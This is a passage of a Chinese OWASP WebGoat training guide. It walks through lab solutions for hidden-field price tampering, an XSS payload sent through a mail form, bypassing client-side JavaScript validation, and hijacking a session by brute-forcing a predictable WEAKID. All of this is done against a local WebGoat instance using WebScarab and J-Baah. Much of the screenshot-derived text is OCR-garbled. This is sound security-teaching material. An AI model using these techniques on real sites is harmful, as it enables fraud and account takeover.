Buy NowPriceQuantitythothwidth='7%'>Total/th>/th>width='10%'>PriceQuantitythothwidth='7%'>Total/th>/th>/th>/th>/th>/th>/th>/th>/td>/th>/td>/tr>/td>/tr>/td>/tr>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/substitution/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>/td>
```

修改隐藏字段数值,然后提交即可完成。



		Intercept requests : 🖃 Intercept responses : 😨	
Parsed Raw			
Method URL			Version
POST http://neo.80/WebGoat	#attack?menu=110		HTTP/1.1
	Header	Value	
sccept		mage/pit, image/cvbitmap, image/peg, image/pipeg, application/c-shockwave-flash, application/ind.mis-ex	
Referer		http://neo/WebGoat/attack?Screen=46&menu=110	
AcceptLanguage		ni be	
Jac (911		approved app	
Icrem Enroding		nrin defiate	Insert
User-Agent		Modilar4.0 (compatible: MSE 7.0, Windows NT 51: NET CLB 11 4322; NET CLB 20 50727)	
Proxy-Connection		Keep Alive	Delete
Content-length		20	
Host		neo:	
Pragma		no cache	
Dookie		USESSIOND=D6BF8FAA6C869C461894EAC99A6C1678	
Authorization		Basic ZTVI: 305ZTVI: 30=	
+ <b>7</b>	-		
URLEncoded Text Hex			
	Variable	Value	
OTY		1	
SUBMIT		Update Cart	
Price			
			Insert
			Insert Delete
			Insert Delete
			Insert Delete
			lesert Delete
			Insert Delete
			Insert Delete
			lesert Delete
			Insert Delete
			Insert Delete
¥			Insert Delete

Solution VideosTry to purchase the HDTV for less than the purchase Restart this Lesson price, if you have not done so already.

#### \* Congratulations. You have successfully completed this lesson.

Your total price is: \$12.0

This amount will be charged to your credit card immediately.

ASPECT SECUR

OWASP Foundation | Project WebGoat | Report Bug

### 2.16.3利用未检查的 E-mail (Exploit Unchecked Email)

### 2.16.3.1 技术概念或主题(Concept / Topic To Teach)

验证所有的输入信息总是不错的做法。多数网站都允许一个非验证的用户给"朋友"发送 e-mail。对垃圾邮件发送者来说,这是一个绝佳的机制,可以利用公司的邮件服务器来发送电子邮件。

### 2.16.3.2 技术原理(How It works)

很多网站对输入数据的合法性未做验证。



### 2.16.3.3 总体目标(General Goals)

及还 封マ八内八的L-IIIall	发送-	·封令	人讨	厌的	E-mail
-------------------	-----	-----	----	----	--------

Solution Videos

**Restart this Less** 

This form is an example of a customer support page. Using the form below try to: 1) Send a malicious script to the website admin. 2) Send a malicious script to a 'friend' from OWASP.

These conf account. L	figurations will eave them as	l enable WebGoat to s the default value to u	send emai use WebG	l on your behalf using yo pat's simulated mail.	our gmail
GMail logir	ı id:	GMail id			
GMail pass	word:	•••••			
Send OWA	SP your Con Us	nments	с	ontact Information:	-5
Send OWA Contact We value y questions o please enter you provide Policy.	US our comments r comments r r your comme s will be handl	nments . To send OWASP yo egarding the WebGoa ents below. The inforr ed according to our <u>P</u>	our O at tool, 9 mation S Privacy C	ontact Information: WASP 175 Guilford Rd uite 300 olumbia, MD. 21046	
Send OWA Contact We value y questions o please ente you provide Policy. Subject:	USP your Con US our comments or r your comment e will be handl Comment f	To send OWASP yo egarding the WebGoa ints below. The inforr ed according to our <u>P</u> for WebGoat	our O at tool, 9 mation S Privacy C	ontact Information: WASP 175 Guilford Rd uite 300 olumbia, MD. 21046	

### 2.16.3.4 操作方法(Solutions)

发送一封包含跨站脚本攻击代码的邮件。输入<script>alert("XSS")</script>,发送邮件,实现跨站脚本攻击。



Solution VideosThis form is an example of a customer support page. Restart this Lesson Using the form below try to:

- Send a malicious script to the website admin.
   Send a malicious script to a 'friend' from OWASP.

\* The attack worked! Now try to attack another person than the admin.

Go	ogle Mail Configurat	ion (Optional)	来自网页的消息	×
These configurations wi gmail account. Leave th GMail login id:	II enable WebGoat to s em as the default valu GMail id	end email on your e to use WebGoat	🛕 xss	
GMail password:	•••••		确知	È

#### Send OWASP your Comments

or comments regarding the WebGoat tool, please enter your comments below. The information you provide will be handled according to our <u>Privacy Policy</u>.

#### Contact Us We value your comments. To send OWASP your questions

Contact Information:			
OWASP			
9175 Guilford Rd			
Suite 300			
Columbia, MD. 21046			

Subject:	Comment for WebGoat	
Questions o	r Comments:	[hidden field name ="to"]:
Questions or Comments:		webgoat.admin@owasp.or
<script></th><th>alert("XSS")</script>	Send!	
		Ŧ

将隐藏域中的邮箱修改为其他邮箱,向其他人(bill.gates@microsoft.com)发送恶意 邮件。也可以通过 WebScarab 修改相应的字段。

#### Send OWASP your Comments

<b>Contact Us</b> We value your comments. To send OWASP your questions or comments regarding the WebGoat tool, please enter your comments below. The information you provide will be handled according to our <u>Privacy Policy</u> .			Contact Information: OWASP 9175 Guilford Rd Suite 300 Columbia, MD. 21046
Subject:	Comment for WebGoat		
Questions or (	Comments:		[hidden field name ="to"]: bill.gates@microsoft.com
<script>al</td><td>ert("XSS")</script>	*		
		Ŧ	Send!



👙 Edit Request

http://www.owasp.org.cn

Intercent requests : 🔽	Intercent responses :

Raw						
RL					3	
nttp://lo	alhost.:	8080/Web	oat/attack?Screen=73&me	nu=1600		
				Value		
ima	ige/jpeg	, applicatio	k-ms-application, image/g	if, application/xaml+xml, image/pjpeg, application/x-ms-xbap,		
http	://localh	ost.:8080/V	bGoat/attack?Screen=738	kmenu=1600		
n zh-0	SN				-	
	*********					
oded	Text	Hex				
		Variable		Value		
				GMail id		
qPass			password			
subject			Comment for WebGoat			
to				bill.gates@microsoft.com		
msg <script>alert("XSS")</script</td><td><script>alert("XSS")</script>						
				Send!		
	Raw RL ttp://lou ima intp zb-c	Raw RL ttp://localhost.: image/jpeg http://localh zh-CN ded Text	Raw RL ttp://localhost:8080/WebGo image/jpeg, application// http://localhost:8080/We http://localhost:8080/We zh-CN ded Text Hex Variable	Raw         RL         ttp://localhost.:8080/WebGoat/attack?Screen=73&me         image/jpeg, application/x-ms-application, image/g         http://localhost.:8080/WebGoat/attack?Screen=73&me         xh-CN         vded       Text         Variable	Raw       RL       ttp://localhost.:8080/WebGoat/attack?Screen=73&menu=1600       value       image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pipeg, application/x-ms-xbap,       http://localhost.:8080/WebGoat/attack?Screen=73&menu=1600       zh-cN       value       Variable       Variable       Variable       Variable       Variable       Variable       Variable       Variable       comment for WebGoat       bill.gates@microsoft.com  <script>alert("XSS")</script> Send!	

Solution VideosThis form is an example of a customer support page. Restart this Lesson Using the form below try to: 1) Send a malicious script to the website admin. 2) Send a malicious script to a 'friend' from OWASP.

#### \* Congratulations. You have successfully completed this lesson.

Go	ogle Mail Configura	ation (Optional)	来自网页的消息	×
These configurations wil gmail account. Leave th GMail login id:	I enable WebGoat to em as the default val GMail id	send email on you ue to use WebGoat	🔺 🗼 xss	
GMail password:	•••••		确定	

#### Send OWASP your Comments

#### Contact Us

We value your comments. To send OWASP your questions or comments regarding the WebGoat tool, please enter your comments below. The information you provide will be handled according to our <u>Privacy Policy</u>. 9175 Guilf

Contact Information: OWASP 9175 Guilford Rd Columbia, MD. 21046

Subject:	Comment for WebGoat	
Questions or C	comments:	

<script>alert("XSS")</script>

[hidden	field	name
="to"]:		

webgoat.admin@owasp.or

Send!

.



## 2.16.4绕过客户端 JavaScript 校验(Bypass Client Side

### JavaScript Validation)

### 2.16.4.1 技术概念或主题(Concept / Topic To Teach)

客户端验证不应该被认为是一种安全的方法验证参数。这种验证方式只能帮那些不知道 所需输入的用户缩短服务器处理时间。攻击者可以用各种方法轻易的绕过这种机制。任何客 户端验证都应该复制到服务器端。这将大大减少不安全的参数在应用程序中使用的可能性。 在这个练习中,每个输入框中有不同的输入要求,您要做的就是绕过客户端验证机制破坏这 些规则,输入不允许输入的字符。

### 2.16.4.2 技术原理(How It works)

很多浏览器辅助工具都支持修改 HTML 或 JavaScript 代码,也支持手动提交 HTTP 数据。

### 2.16.4.3 总体目标(General Goals)

在这个练习中,每个输入框中有不同的输入要求,您要做的就是绕过客户端验证机制破 坏这些规则,输入不允许输入的字符。

Solution Videos		Restart this Lesson
This website performs both clie the client side validation and se 7 validators at the same tim	nt and server side validation. For this exercise, and the website input that it wasn't expecting. 	, your job is to break <b>You must break all</b>
Field1: exactly three lowercase abc	characters(^[a-z]{3}\$)	
Field2: exactly three digits(^[0 123	-9]{3}\$) ¢	
Field3: letters, numbers, and s abc 123 ABC	pace only(^[a-zA-Z0-9 ]*\$)	
Field4: enumeration of number seven	s (^(one two three four five six seven eight	nine)\$)
Field5: simple zip code (^5) 90210	}\$) €	
Field6: zip with optional dash fo 90210-1111	our (^\d{5}(-\d{4})?\$) €	
Field7: US phone number with 301-604-4882	or without dashes (^[2-9]\d{2}-?\d{3}-?4	}\$)
Submit		



### 2.16.4.4 操作方法(Solutions)

### 2.16.4.4.1 方法一

正常提交一次数据,并使用 WebScarab 拦截。

Edit Request						
		Intercept requests :	Intercept respons	ns: 🔲		
Parsed Raw						
Method URL						Version
POST http://neo.80/Web/Goat/attack?menu=110						HTTP/1.1
Ma	arter			Value	11	
ccept	a das t	imi	alay water a second	image/peg. image/pipeg. application/k-shockwave-flash, applicatio	m/md.ms	-
teferer		http	ineo/WebGoat/attack	Screen=63&menu=110		Insert
ccepl-Language		nl-t	ie			
ontent-Type		app	lication/e-wwweform-ur	encoded		Delete
JA-CPU		×86				
unant Fanadian L W		lasi	n daflata		1.51	
URLEncoded Text Hex						
Var	riable			Value		
ield1		at	x			
ield2		13	23			
leld3		at	x 123 ABC			
ield4		56	iven			
ield5		90	0210			
fieldő		90	0210-1111			
Prov.		100	11004 4002			
						Insert
						Delete
			1			
	Accept changes	Cancer changes	Abort request	Cancel ALL intercepts		

篡改各个字段对应的数据,使之违反校验规则。

	Intercept r	requests : 🗹 Intercept responses : 🛄	
Parsed Raw			
lethod LIRL			Version
OST http://neo.80/WebGoat/attack?menu=110			HTTP/1
-	leader	Váluð	1
ccept		image/gif, image/xbitmap, image/peg, image/pipeg, application/x-shockwave-flash, application/ind.ms	-
eferer		http://webGoatlattack?Screen=638menu=110	Inser
ccept-Language		ni be	Delet
A.CPU		appications-www-ions-unencoded	_
and fearting		artin daftata	*
URI Encoded Text Hex			
and the lines	fariable	Malaa	1
oldit.	101000	ab(@#@(@#)	-
652		123@#@X@#	
183		ର୍ଣ୍ଣର ହେମ୍	
104		seven@#@(@#	
N/d5		90210@#@(@#(	
eldő		90210-1111@#@@@#i	
#0£7		201-604-4882/82#62(82#)	
			Inser
			Delet
			-

点击 "Accept changes"提交数据,通过本节课程。





### 2.16.4.4.2 方法二

重新再也页面"How to bypass Client-Side Javascript Validation",并启用 WebScarab 拦截服务端响应数据。

🔹 Edit Request			
		Intercept requests : 📝 Intercept responses ; 📶	
Parsed Raw			
Method URL			Version
GET   http://neo.80/WebGoat/attack?Screen=638menu=110			HTTP/s
Header		Value	110
ucept		mageigif, image/wbitmap, imageijpeg, imageipipeg, application/wshockwave-fash, application/ind ms-	12
2eferer		http://neo/WebGoat/attack?menu=110	
kceptLanguage		71-D4	
ArcestEncoding		into deflate	Inse
User-Apent		Modilal4.0 (compatible MSIE 7.0, Windows NT 5.1, NET CLR 1.1.4322, NET CLR 2.0.50727)	Deter
Proxy-Connection		Keep-Alive	
Host		neo	
Cookie		JSESSIONID=D5BF6FAA6CS69C451894EAC99A6C1678	
to the second second		Basic 73//r30673//r30/	
winergation		Prove to conservation.	
Uncontration Hex Postion 0 1 2 3 4 5 6 7 8 9 A 8 C D E	F String		
1990-0000 Hex   Position  0 1 2 3 4 5 6 7 8 9 A B C D ⊑	F String		


Edit Res	ponse					
			inte	ercept requests : 📝 Intercept respo	nses : 🖌	
Parsed	Raw					
thod UF	L					Version
T H	p://neo:8	00/WebOoal/attack?Screen=83	&menu=110			HTTP/1.1
			Header	and the second se	Value	
tqu				image/git, image/	w xbitmap, imagelipeg, imagelpipeg, application/wisho	clovave-flash, application/ind mp-excel, a
ant i an	uste.			ngp aneonvep Gol	aganack /monue110	
PU	toate			196		
pl-Enc	ding			gtip, deflate		
				Statist & America	AREA MORE ED. MICHAELEN AIT & S. ART CLOSER AND	AFT CLD DD 40235
irsed	Raw					
sion	Status	Message				
TP/1 1	200	OK				
			Header		Value	
ér			1100001	Apache-Coyote/1.1	7.910.0	
gmia .				No-cache		
the Con	trol			no-cache		Insert
ires				Thu, 01 Jan 1970 01:00	0.00 CET	Delete
tent-Typ	0			terthim(charsetiis0-s	859-1	
russer-ar	coung			Wed 17 Jan 2007 15-5	2.12.OMT	
-				1100, 1100112001123	N.TE VIII	
IMI	KMI	Text Hex				
darea ci y>< iv> <div darea ci h&gt;&lt; im&gt;<td>its="26" n Fiel its="25" n nput type (*</td><td>name=Tield8'rows="1&gt;90216-1 ld7: US phone number with or v name=Tield7' rows="1&gt;301-604 e=BUTTOK pnctrks=Yalidate0;</td><td>1111-flordarea+ wthout dash-es (*(2-4)(d(2)-70d(3)-70d(4)6) 4-6022-flordarea+ gratue=Submit* «dir ida*credits*» «table align=Ri(0+1* cellspa</td><td>rcinda A.mqqua 20%, pouqeia A. cellbaqq</td><td>inge Viv</td><td></td></div 	its="26" n Fiel its="25" n nput type (*	name=Tield8'rows="1>90216-1 ld7: US phone number with or v name=Tield7' rows="1>301-604 e=BUTTOK pnctrks=Yalidate0;	1111-flordarea+ wthout dash-es (*(2-4)(d(2)-70d(3)-70d(4)6) 4-6022-flordarea+ gratue=Submit* «dir ida*credits*» «table align=Ri(0+1* cellspa	rcinda A.mqqua 20%, pouqeia A. cellbaqq	inge Viv	
-						

如果移除 onclick="validate();",那么 Submit 按钮将无法工作,因此定位到 validate()函数,

	Intercept responses :      Value     Value     Magelgit (magel/xbitmae, imagelgieg, imagelgieg, applicationic shockwave-fit     http://magelgieg.applicationic.shockwave-fit     doggeggetate     value     Apache-Cayotert 1     Value     Apache-Cayotert 1     Value	Version HTTP/I ssh, application/md ms-excel, a
Parsed Raw Method IRR. OET http://neo.80/Web/ooat/attack?8creen=636menu=110  Accept Header  Accept Reverence Raw  Accept Reverence Raw  Version Status Message HTTPr1.1 200 Occ  Banker Header  Sanker Control Express Control	Value Imagelgif, Imagelvxbitmap, Imagelpipeg, Imagelpipeg, application/s-shockwave-fil http://neoWvebCoaWattack?menu=110 http://neoWvebCoaWattack?menu=110 http://neoWvebCoaWattack?menu=110 gdp_defiate Monitorial & downeeWvebCoaWattack.com Att Edu Unit of the 4 4335 Att To 11 Monitorial & downeeWvebCoaWattack.com Att Edu Unit of the 4 4335 Att To 11 Monitorial & downeeWvebCoaWattack.com Att Edu Unit of the 4 4335 Att To 11 Apache-Coyoter1 1 No-cache no cache	Version HTTP/I ssh, application/md ms-excel, a
Method UR. OET http://neo.80/Web0oat/attack?Screen=63&menu=110 Accept Header Accept Rever Accept Rever Parsed Rever Parsed Rever For son Status Message HTTP://1 200 OK Server Fagena Cache Control Sprefe Screen Rever Fagena Cache Control Sprefe Screen Rever Fagena Cache Control	Value magelgif, (magel/sobitmag, (magelgeg, imagelgieg, applicationis-shockwave-fil http://neoWebCoaWatack/menue110 n-be ggg, defade broothick & / commentation short = 10 literations strf & c. stort of the c. 4 4000. stort of the broothick & / commentation short = 10 literations strf & c. stort of the c. 4 4000. stort of the Apache-Coyotari 1 Value Apache-Coyotari 1 No-cache	Version HTTP/I ash, application/vnd ms-excel, a.
OET http://heo.960/Web/Goal/attack?Screen-634menu=110  Accept Kolever Kolever Person Row Parsed Row HTTP/1 1 200 DK  Server Fragma Cache Contol Expire Fragma Cache Contol Fragma Cache Fragma Cache Contol Fragma Cache Conto Fragm	Value Imagelgif, Imagelykobitmap, Imagelgeg, Imagelgeg, Bpell altonk-shockwave-fi ne-be gog, deflate storing no have been some to use down and discussion of discussion and storing no have been some to use down and discuss and discussion value Apache-Coyotert 1 No-cache no cache	HTTP://
Accept Heador Referer Referer Vaccept Encoding Vaccept Encodin	Value magelgrit (mageliv-bbitmag, imagelipeg, imagelipeg, applicationis-shockwave-fil http://neuWebGoaVattack?menue110 http://doi.org/10.1011/0010110101010101010101010101010	ash, application/ind ms-excel, a
Accept Ac	Image(gr) (mage(x) bitmap), mage(pag, image(p)pag, applications's shockwaye-fit http://meos/webGoal/attack?menuer 110 nkbe page_defiate gate_defiate Monitor(s & Amage and a short 7 & unit of a state of a state of a Monitor(s & Amage and a short 7 & unit of a state of a state of a Monitor(s & Amage and a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a state of a Monitor(s & Amage and a state of a state of a state of a state of a Monitor(s & Amage and a state of a Monitor(s & Amage and a state of a state	ash, application/ind ms-excel, a
Average Language VACPU V	ne principal de la construction	D 1 4 (A13)
Uw-CPU Parsed Rew Version Status Message HTTPr11 200 OK Header Save Header Save Header Save Control Spore Save Save Save Save Save Save Save Sav	k80 pop, defade Novini is 6 // Annual sole to land annual set of a set of a set of a Apacha-Coyotari 1 No-cache po-cache	D 1461173
Accept Encoding Version Status Message HTTPr/1 200 OK Server Header Prigma Cache Control Spring Content / Dig E	pop, defaile Monitor & downandelan Molth T & Likeleyense APT & Likeleyense Aptiche-Coyoter1.1 No-tache Do cache	0.1469137
Parsed Raw Version Status Message HTTP1.1 200 OK Header Server Parama Cache Control Expires Content-Type	Apache-Coyoten 1 Value Apache-Coyoten 1	
Parsed Raw	Apacha-Coyotari 1 Value No-cache no-cache	
Parsed Rew   Version Status Message HTTPrI 1 200 0K Berver Header Pragma Cache-Control Expires Ontend-Type	Apache-Coyotert 1 Value - No-cache - No-cache - No-cache	
Version Status Message HTTP/I 1 200 OK Header Server Prapma Cache Control Expires Content-Type	Apacha-Coyote/1.1 No-tache no-tache	
HTTP/I 1 200 OK Header Savue Header Pragma Sache-Control Expires Content-Type	Apache-Coyote/1.1 No-cache no-cache	
Header Pragma Cache-Control Expires Content-Type	Value No-cache no-cache	
Server Tragma Cache-Control Expires Content-Type	Apache-Coyote/1 1 No-cache Ino-cache	
rragma Expires ContentType	no-cache	procession and the second s
Content-Type	no-cacito	inser
Content-Type	Thu 01 Jan 1970 01:00:00 CET	
	texthtml;charset=ISO-8859-1	Delet
Transfer-Encoding	chunked	
Date	Wed, 17 Jan 2007 15:53:12 GMT	
HTML XML Text Hex		
unction validation (     implication (       (regress/balldown (     implication (       (re	Abort compart	4
Accept changes Cancel change	Abort request Cancel ALL intercepts	

删除正则校验部分的代码即可移除 JavaScript 校验功能。

🕏 Edit Respo	nse											
						Intercept requests :	Intercept response	ises	: 🗹			
Parsed Ra	aw											
Method URL												Version
OET http://	Ineo:8	0/WebGos	Vattack?Screer	=63&menu=110								HTTP/1.1
				Header				_		Value		
Accept							image/gif, image/	6-xbitr	map, image/jpeg, image/pi	peg, application/k-sho	ckwave-flash, application/vnd.m	is-excel, a 🔺
Referer							http://neo/WebGoa	itiatta	ick?menu=110			
Accept-Langua	age :						nl-be					_
UA-CPU							386					
Accept Encodin	ng						gzip, denase	atible	MOIT T O Mindaus ALT &	NET OLD 4 4 4333	NET OLD 3 0 807375	
74												
Parsed R	aw											
Version S	status	Message	8									
HTTP/1.1 2	200	0K										
				Header		1		_	Val	ue		
Server						Aç	bache-Coyote/1.1					
Pragma						N	o-cache					
Cache-Control	1					no	o-cache					Insert
Expires						17	nu, 01 Jan 1970 01:00	1:00 C	CET			Delete
Content-Type	dia a					te	charset=ISO-6	059-	1			_
Transfer-Encol	ding					Cf	lunked	240	ONT			-
Date						111	eu, 17 Jan 2007 15.5	3.12	0.001			_
MITAN YAN	. 1.	and the	-									
FITHEL ASS	<b>n.</b> - 1 - 1	IDM NO	*									
regex1=/4a-z](	318/.											-
regex2=P(0-9)(	(3)\$(;											
regex3=/*(a-zA-	-Z0-9]	*\$/;										
regez4=/*(one)	]two th	ree four fiv	e[six]seven]eigi	htjnine)\$/,								
regex5=/%d(5)	\$/;											
regex6=/*id(5)(	(-)d(4))	?\$/;										
regex7=/^{2-9]b	w(2)-?	d[3]-?id[4	)\$/,									
function validat	6e0 {											100
form submito;												
UDO DIDT.												
4		1										
lac'					<b></b>	ń	í	l en r		1		1.1.1
					Accept changes	Cancel changes	Abort request		Cancel ALL intercepts			

### 点击"Accept changes"按钮,则浏览其接收到的 HTML 中将不再有正则校验功能。



设定各字段数据,使其违反校验规则。然后提交。

OWASP 中国 The Open Web Application Security Project



服务端返回数据提交成功,完成本课程。

OWASP 中国 The Open Web Application Security Project





## 2.17 会话管理缺陷(Session Management Flaws)

### 2.17.1会话劫持(Hijack a Session)

### 2.17.1.1 技术概念或主题(Concept / Topic To Teach)

开发人员在开发他们的自有会话 ID 时经常忘记整合的复杂性和随机性,这些因素对安全来说是必须的。如果用户的特定的会话 ID 不具备复杂和随机性,那么应用程序很容易受到基于会话的暴力攻击的威胁。

### 2.17.1.2 技术原理(How It works)

会话 ID 一般由 Session 生成,存储在客户端 Cookie 的某个字段中。

### 2.17.1.3 总体目标(General Goals)

本课程的目标是尝试访问一个其他用户的会话(该会话已经过服务器认证)。我们尝试 预测 WEAKID 的数值。WEAKID 用于区别 WebGoat 中不同用户(经过认证的或匿名的)。

Solution VideosApplication developers who develop their own session Restart this Lesson
IDs frequently forget to incorporate the complexity
and randomness necessary for security. If the user specific session ID is not complex and
random, then the application is highly susceptible to session-based brute force attacks.

#### General Goal(s):

Try to access an authenticated session belonging to someone else.

Sign In [hidden field name ="W 19114-1318219347257	'EAKID'']:
Please sign in to your a *Required Fields	ccount.
*User Name:	
*Password:	
Login	
	By Rogan Dawes of ASPECT SECURITY Application Security Specialists

OWASP Foundation | Project WebGoat | Report Bug



## 2.17.1.4 操作方法(Solutions)

完成这一课最容易的方法是使用 WebScarab 的【Session ID Analysis】。进入 WebScarab, 点击【Session ID Analysis】,如果您看不到,则在 WebScarab 工具菜单【Tool】中选择 使用全功能模式(full-featured mode),然后重启 WebScarab 即可。

进入工具上方【SessionID Analysis】选项卡,使用【Previous Requests】下拉菜单选择最近的消息包含 200 0K 的 GET 请求。其地址以 webgoat/attack 结束,不是图片或 Java 文件。

ile View Tools	Help							
Extensions XS	S/CRLF	SessionID Anal	ysis So	ripted Fragm	ents Fuzzer Compar	re Search		
Summary	r	Messages	- r	Proxy	Manual Request	100	WebServices	Spider
Collection Anal	ysis	Visualisation						
Previous Requests rom message bod Regex Parsed Raw Method URL Header	; y 145 - 0 146 - 0 149 - 0 150 - 0 151 - 0 152 - 0 /alue	ET http://localhos ET http://localhos ET http://localhos ET http://localhos ET http://localhos ET http://localhos ET http://localhos	t.:8080/w/ t:8080/w/ t:8080/w/ t:8080/w/ t:8080/w/ t:8080/w/ t:8080/w/	ebgoatimagesit abgoatimagesit ebgoatiattack mgoaticss.weo ebgoaticss.less ebgoaticss.layer ebgoaticss.layer ebgoatijavascrip	uttons/cookiesOver.jpg 3 uttons/cookiesOver.jpg 304 200 OK DALCES 304 Not Modified u.css 304 Not Modified u.css 304 Not Modified u.css 304 Not Modified tjavascript.js 304 Not Mo	304 Not Modified d odified	led	Insert Delete
Response	1							
Version State	is Mess	sage						
Header V	is Mes: /alue	lage						
Header	is Mes: /alue		1	Test Sam	vies 0 <sup>+</sup> / <sub>+</sub> Fetch			

接下来,您需要确认 WebScarab 能够捕获 WEAKID cookie。点击工具下方的【Test】按钮,您将看到弹出的窗口中显示了 WEAKID。



WebScarab									
le View Ic	ools Help								
Extensions	XSSICRLF	SessionID Ana	alysis Scripted	Fragments	Fuzzer	Compare	Search		
Summa	ry 🚺	Messages	Proxy	<u> </u>	Manual Re	quest	1	WebServices	Spider
Collection	Analysis	Visualisation							
revious Requ	ests : 147 -	GET http://localhe	ost.:8080/webgoat	attack 200 C	ĸ				-
rom message	e body 🔲 N	ame							
egex									
Request									
Parsed F	Raw								
Referer: http:// Cookie: JSES Authorization: Response	localhost.80 SIONID=833 Basic Z3VIc	080/webgoat/attac 8121805E01DE0 3Q6Z3VIc3Q=	Extracted Sessi	onids st./webgoat W	EAKID = 169 X	16-1 <mark>3</mark> 12472:	90703		
Parsed F	Raw						_		
Version	Status Mes	sage							
HTTP/1,1	200 OK								
Header Server	Value Apache-Co								
HTML X	ML Text	Hex							
			Test	Samples	0-	Fetch			
				Used 10.80	of 247.5ME				
						10000			

如果弹出内容没有找到有效的会话 ID,这意味着已经有一个 WEAKID 值的请求。这会阻止服务端响应内容通过 HTTP 消息头 "Set-Cookie"为客户端设置 Cookie。为了解决这个问题,删除 Cookie 中 WEAKID=value;部分,然后再次按【Test】。

现在您需要捕获一系列 WEAKID。在样本字段数目【Samples】中输入"50",然后点击 【Fetch】按钮。切换到【Analysis】选项卡。从【Session Identifier】下拉菜单中选择 WEAKID。该窗口会弹出 WEAKID 的值。

WEAK 被分成了两个部分:减号前面的第一部分显示每个 Cookie 以 1 为步幅增加;第二 部分是请求提交时计算出来的时间值。

注意,有时候 WEAKID 的第一部分会有差距,如:其中一个数值被跳过了。那个丢失的数值就是我们想要登录的(已经有人使用该 ID 在登录,我们要劫持它)。我们只需要想办法确定 SESSIONID 右侧的时间字符串。

通过查看软件界面【Difference】列的内容,很容易找到那个特征的数值。几乎所有的数值都只是一两部分组成。找到我们需要的数据,双击它们。



WebScarab											
Eile View Tools	Help										
Extensions XSS	CRLF	Session	D Analysis	Scripted	Fragments	Fuzzer	Compare	Search			
Summary	T	Messa	ges	Proxy		Manual Re	quest	1	WebServices		Spider
Collection Analy	sis	Visualisatio	n								
Session Identifier - Id	calhor	t internation	WEAKID								1
Date	reun rou	no mengous	TECHNER	Mahua			bluessele		0.4		
Dan				varde			reumenc		U	erence	
2011/08/04 11:40:37		1	6947-13124	72437515				22551	5		6109
2011/08/04 11:40:37			6948-13124	72437625				23162	5		6110
2011/08/04 11:40.37	2		6949-13124	/243//34				23/13	4		6109
2011/08/04 11:40:37			0950-13124	72437843				24384	3		6109
2011/06/04 11:40:37			6052.12124	72437803				24890	2		6100
2011/00/04 11:40:30			6052-13124	70430474				20000	1		6109
2011/08/04 11:40:38	2	-	6054-13124	72430171				26928	1		6110
2011/08/04 11:40:38			6955-13124	72438390				27439	0		6109
2011/08/04 11:40:38	ž.		6956-13124	72438500				28050	0		6110
2011/08/04 11:40:38	8	-	6957-13124	72438609				28660	9		6109
2011/08/04 11:40:38	-	-	6958-13124	72438718				29271	8		6109
2011/08/04 11:40:38	ŝ.	1	6959-13124	72438828				29882	8		6110
2011/08/04 11:40:38	2		6960-13124	72438937				30493	7		6109
2011/08/04 11:40:39	8	1	6961-13124	72439046				31104	5		6109
2011/08/04 11:40:39	č –	1	6962-13124	72439156				31715	6		6110
2011/08/04 11:40:39		51	6963-13124	72439265				32326	5		6109
2011/08/04 11:40:39	č	1	6964-13124	72439375				32937	5		6110
2011/08/04 11:40:39	8	1	6966-13124	72439484				34148	4		12109
2011/08/04 11:40:39		1	6967-13124	/2439593				34759	3		6109
2011/08/04 11:40:39		1	6968-13124	72439703				35370	3		6110
Minimum :											
Maximum :											
0											

注意下面的数据,我们发现以16955开始的WEAKID丢失了,这就是我们要找的。我们 需要做的是补全它的第二部分。

#### **16964**-1312472439375

「王山 down

#### 16966-1312472439484

我们将使用暴力猜解方式完成该操作。我们将发送任何可能的请求,直到破解出该时间 值。由上图值,这个 SessionId 介于以下二者之间:

### 16964-1312472439375

16965-?????????????

### 16966-1312472439484

所以 timestamp 值应介于 1312472439375 和 1312472439484。现在我们需要一个工具 ·来暴力猜解。我们将使用 J-Baah (http://www.sensepost.com/labs/tools/pentest/j-baa

h),该工作最早以Crowbar而知名,下载并运行.jar文件。

我们需要配置 J-Baah 每次使用不同的 WEAKID 重复发送请求。拷贝从 Collection 选项 卡中找到的用来生成 cookie 的原始 HTTP 请求。将它粘贴到 J-Baah 的请求框中。

WEAKID 也需要放入请求中,该字段以丢失的 16965 开头。那么如何填写剩下的部分呢? 在本例中,我们将把字符串 WEAKID=16965-1312472439##1##添加到请求数据包的

Cookie 参数中。##1##将使用某个范围内的 timestamp 时间字符串替换。

接下来,我们将设置这个范围。在【Paramter 1】选项卡中设置数值,从 375 开始到 484 结束。



File       Help         Request       Response       Parameter 1       Parameter 1         GET       http://localhost.3080/webgoat/attack?Screen=218&menu=1800 H       Inner Loop         Host       localhost.8080       User-Agent       Numeric         Accept-Language:       en-us.en.q:e0.5       From:       Accept-Language:         Accept-Language:       en-us.en.q:e0.7, ";q=0.7       From:       From:         Proxy-Connection:       kep-alive       Referer:       http://localhost.8080/webgoat/attack?Screen=219&menu=180         Cookie:       WEAKID=16965-1312.472.439##1##_USESSIONID=833812180       File       File         Authorization:       Basic 23VIC3U623VIC3UE       Actions       Target       Fu         Base       Response       Start       Stop       Pause       Stop       Pause       Stop       Pause       Stop       Pause       Pause       Stop       Pause       Pause       Stop       Pause       Pau	
